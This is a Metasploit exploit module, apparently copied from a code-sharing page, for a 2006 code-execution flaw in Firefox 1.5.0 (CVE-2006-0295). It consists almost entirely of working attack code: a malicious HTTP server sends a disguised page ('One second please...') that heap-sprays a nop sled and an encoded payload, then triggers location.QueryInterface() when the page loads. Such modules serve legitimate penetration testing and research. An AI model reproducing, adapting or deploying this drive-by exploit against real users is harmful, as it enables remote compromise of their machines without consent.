Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  #
10
  # This module acts as an HTTP server
11
  #
12
  include Msf::Exploit::Remote::HttpServer::HTML
13

14
  def initialize(info = {})
15
    super(update_info(info,
16
      'Name'           => 'Firefox location.QueryInterface() Code Execution',
17
      'Description'    => %q{
18
          This module exploits a code execution vulnerability in the Mozilla
19
        Firefox browser. To reliably exploit this vulnerability, we need to fill
20
        almost a gigabyte of memory with our nop sled and payload. This module has
21
        been tested on OS X 10.3 with the stock Firefox 1.5.0 package.
22
      },
23
      'License'        => MSF_LICENSE,
24
      'Author'         =>  ['hdm'],
25
      'References'     =>
26
        [
27
          ['CVE', '2006-0295'],
28
          ['OSVDB', '22893'],
29
          ['BID', '16476'],
30
          ['URL', 'http://www.mozilla.org/security/announce/mfsa2006-04.html'],
31
        ],
32
      'Payload'        =>
33
        {
34
          'Space'    => 1000 + (rand(256).to_i * 4),
35
          'BadChars' => "\x00",
36
        },
37
      'Platform'       => %w{ osx linux },
38
      'Targets'        =>
39
        [
40
          [ 'Firefox 1.5.0.0 Mac OS X',
41
            {
42
              'Platform' => 'osx',
43
              'Arch' => ARCH_PPC
44
            }
45
          ],
46

47
          [ 'Firefox 1.5.0.0 Linux',
48
            {
49
              'Platform' => 'linux',
50
              'Arch' => ARCH_X86,
51
            }
52
          ],
53
        ],
54
      'DisclosureDate' => '2006-02-02'
55
      ))
56
  end
57

58
  def on_request_uri(cli, request)
59

60
    # Re-generate the payload
61
    return if ((p = regenerate_payload(cli)) == nil)
62

63
    print_status("Sending #{self.name}")
64
    send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })
65
    handler(cli)
66
  end
67

68
  def generate_html(payload)
69

70
    enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
71
    enc_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch))
72

73
    return <<-EOF
74
<html>
75
<head>
76
<title>One second please...</title>
77
<script language="javascript">
78

79
function BodyOnLoad() {
80
  h = FillHeap();
81
  location.QueryInterface(eval("Components.interfaces.nsIClassInfo"));
82
};
83

84
function FillHeap() {
85
  // Filler
86
  var m = "";
87
  var h = "";
88
  var a = 0;
89

90
  // Nop sled
91
  for(a=0; a<(1024*256); a++)
92
    m += unescape("#{enc_nops}");
93

94
  // Payload
95
  m += unescape("#{enc_code}");
96

97
  // Repeat
98
  for(a=0; a<1024; a++)
99
    h += m;
100

101
  // Return
102
  return h;
103
}
104
</script>
105
</head>
106
<body onload="BodyOnLoad()">
107
</body>
108
</html>
109
EOF
110
  end
111
end
112

113